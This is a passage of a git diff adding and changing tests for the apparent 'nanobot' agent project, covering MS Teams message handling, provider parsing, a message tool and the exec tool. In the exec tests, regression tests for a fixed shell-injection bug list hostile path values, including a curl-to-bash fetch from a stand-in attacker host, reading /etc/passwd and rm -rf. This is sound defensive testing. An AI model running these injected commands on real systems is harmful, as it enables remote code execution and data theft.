user" + + +def test_parse_sdk_non_stepfun_no_reasoning_as_content() -> None: + """SDK branch: providers without flag must not treat reasoning as content.""" + with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): + provider = OpenAICompatProvider() + + msg = _make_sdk_message(content=None, reasoning="internal monologue") + choice = SimpleNamespace(finish_reason="stop", message=msg) + response = SimpleNamespace(choices=[choice], usage=None) + + result = provider._parse(response) + + assert result.content is None + assert result.reasoning_content == "internal monologue" diff --git a/tests/test_msteams.py b/tests/test_msteams.py index f5597c38d..b4dcf34f2 100644 --- a/tests/test_msteams.py +++ b/tests/test_msteams.py @@ -1,4 +1,5 @@ import json +import time import pytest @@ -260,6 +261,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel): assert ch._sanitize_inbound_text(activity) == "normal inline message" +def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel): + ch = make_channel() + + activity = { + "text": "Hello from Teams", + "channelData": {}, + } + + assert ch._sanitize_inbound_text(activity) == "Hello from Teams" + + def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel): ch = make_channel() @@ -371,7 +383,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel): @pytest.mark.asyncio -async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel): +async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel): ch = make_channel(replyInThread=True) fake_http = FakeHttpClient() ch._http = fake_http @@ -387,7 +399,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe assert len(fake_http.calls) == 1 url, kwargs = fake_http.calls[0] - assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1" + assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities" assert kwargs["headers"]["Authorization"] == "Bearer tok" assert kwargs["json"]["text"] == "Reply text" assert kwargs["json"]["replyToId"] == "activity-1" @@ -551,6 +563,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"] +def test_save_refs_prunes_webchat_and_stale_refs(make_channel): + ch = make_channel() + now = time.time() + ch._conversation_refs = { + "teams-good": ConversationRef( + service_url="https://smba.trafficmanager.net/amer/", + conversation_id="teams-good", + conversation_type="personal", + updated_at=now, + ), + "webchat-bad": ConversationRef( + service_url="https://webchat.botframework.com/", + conversation_id="webchat-bad", + conversation_type=None, + updated_at=now, + ), + "teams-stale": ConversationRef( + service_url="https://smba.trafficmanager.net/amer/", + conversation_id="teams-stale", + conversation_type="personal", + updated_at=now - (31 * 24 * 60 * 60), + ), + } + + ch._save_refs() + + assert set(ch._conversation_refs) == {"teams-good"} + saved = json.loads(ch._refs_path.read_text(encoding="utf-8")) + assert set(saved) == {"teams-good"} + assert saved["teams-good"]["updated_at"] == pytest.approx(now) + + def test_msteams_default_config_includes_restart_notify_fields(): cfg = MSTeamsChannel.default_config() diff --git a/tests/tools/test_exec_env.py b/tests/tools/test_exec_env.py index 47b2c313d..b9567f29d 100644 --- a/tests/tools/test_exec_env.py +++ b/tests/tools/test_exec_env.py @@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch): tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"]) result = await tool.execute(command="printenv NONEXISTENT_VAR_12345") assert "Exit code: 1" in result + + +# --- path_append injection prevention ------------------------------------ + + +@_UNIX_ONLY +@pytest.mark.asyncio +@pytest.mark.parametrize( + "malicious_path", + [ + # semicolon — classic command separator + '/tmp/bin; echo INJECTED', + # command substitution via $() + '/tmp/bin; echo $(whoami)', + # backtick command substitution + "/tmp/bin; echo `id`", + # pipe to another command + '/tmp/bin; cat /etc/passwd', + # chained with && + '/tmp/bin && curl http://attacker.com/shell.sh | bash', + # newline injection + '/tmp/bin\necho INJECTED', + # mixed shell metacharacters + '/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED', + ], +) +async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path): + """Shell metacharacters in path_append must NOT be interpreted as commands. + + Regression test for: path_append was previously concatenated into a shell + command string via f'export PATH="$PATH:{path_append}"; {command}', which + allowed shell injection. After the fix, path_append is passed through the + env dict so metacharacters are treated as literal path characters. + """ + tool = ExecTool(path_append=malicious_path) + result = await tool.execute(command="echo SAFE_OUTPUT") + + # The original command should succeed + assert "SAFE_OUTPUT" in result + + # None of the injected payloads should have produced side-effects + assert "INJECTED" not in result + assert "root:" not in result # /etc/passwd content + + +@_UNIX_ONLY +@pytest.mark.asyncio +async def test_exec_path_append_command_substitution_does_not_execute(tmp_path): + """$() in path_append must not trigger command substitution. + + We create a marker file and try to read it via $(cat ...). If command + substitution works, the marker content appears in output. + """ + marker = tmp_path / "secret_marker.txt" + marker.write_text("SHOULD_NOT_APPEAR") + + tool = ExecTool( + path_append=f'/tmp/bin; echo $(cat {marker})', + ) + result = await tool.execute(command="echo OK") + + assert "OK" in result + assert "SHOULD_NOT_APPEAR" not in result + + +@_UNIX_ONLY +@pytest.mark.asyncio +async def test_exec_path_append_legitimate_path_still_works(): + """A normal, safe path_append value must still be appended to PATH.""" + tool = ExecTool(path_append="/opt/custom/bin") + result = await tool.execute(command="echo $PATH") + assert "/opt/custom/bin" in result diff --git a/tests/tools/test_exec_platform.py b/tests/tools/test_exec_platform.py index b24d01ac4..b3d7f4c18 100644 --- a/tests/tools/test_exec_platform.py +++ b/tests/tools/test_exec_platform.py @@ -148,23 +148,33 @@ class TestSpawnWindows: class TestPathAppendPlatform: @pytest.mark.asyncio - async def test_unix_injects_export(self): - """On Unix, path_append is an export statement prepended to command.""" + async def test_unix_uses_env_var_in_fixed_export(self): + """On Unix, path_append must not be interpolated into shell source.""" mock_proc = AsyncMock() mock_proc.communicate.return_value = (b"ok", b"") mock_proc.returncode = 0 + captured_cmd = None + captured_env = {} + + async def capture_spawn(cmd, cwd, env): + nonlocal captured_cmd + captured_cmd = cmd + captured_env.update(env) + return mock_proc + with ( patch("nanobot.agent.tools.shell._IS_WINDOWS", False), - patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn, + patch("nanobot.agent.tools.shell.os.pathsep", ":"), + patch.object(ExecTool, "_spawn", side_effect=capture_spawn), patch.object(ExecTool, "_guard_command", return_value=None), ): - tool = ExecTool(path_append="/opt/bin") + tool = ExecTool(path_append="/opt/bin; echo INJECTED") await tool.execute(command="ls") - spawned_cmd = mock_spawn.call_args[0][0] - assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd - assert spawned_cmd.endswith("ls") + assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls' + assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED" + assert "INJECTED" not in captured_cmd @pytest.mark.asyncio async def test_windows_modifies_env(self): @@ -181,6 +191,7 @@ class TestPathAppendPlatform: with ( patch("nanobot.agent.tools.shell._IS_WINDOWS", True), + patch("nanobot.agent.tools.shell.os.pathsep", ";"), patch.object(ExecTool, "_spawn", side_effect=capture_spawn), patch.object(ExecTool, "_guard_command", return_value=None), ): diff --git a/tests/tools/test_message_tool.py b/tests/tools/test_message_tool.py index b65b5cd8d..18a881215 100644 --- a/tests/tools/test_message_tool.py +++ b/tests/tools/test_message_tool.py @@ -1,6 +1,7 @@ import pytest from nanobot.agent.tools.message import MessageTool +from nanobot.bus.events import OutboundMessage @pytest.mark.asyncio @@ -29,3 +30,23 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None: content="hi", channel="telegram", chat_id="1", buttons=bad, ) assert result == "Error: buttons must be a list of list of strings" + + +@pytest.mark.asyncio +async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None: + sent: list[OutboundMessage] = [] + + async def _send(msg: OutboundMessage) -> None: + sent.append(msg) + + tool = MessageTool(send_callback=_send) + + await tool.execute(content="normal", channel="telegram", chat_id="1") + token = tool.set_record_channel_delivery(True) + try: + await tool.execute(content="cron", channel="telegram", chat_id="1") + finally: + tool.reset_record_channel_delivery(token) + + assert sent[0].metadata == {} + assert sent[1].metadata == {"_record_channel_delivery": True}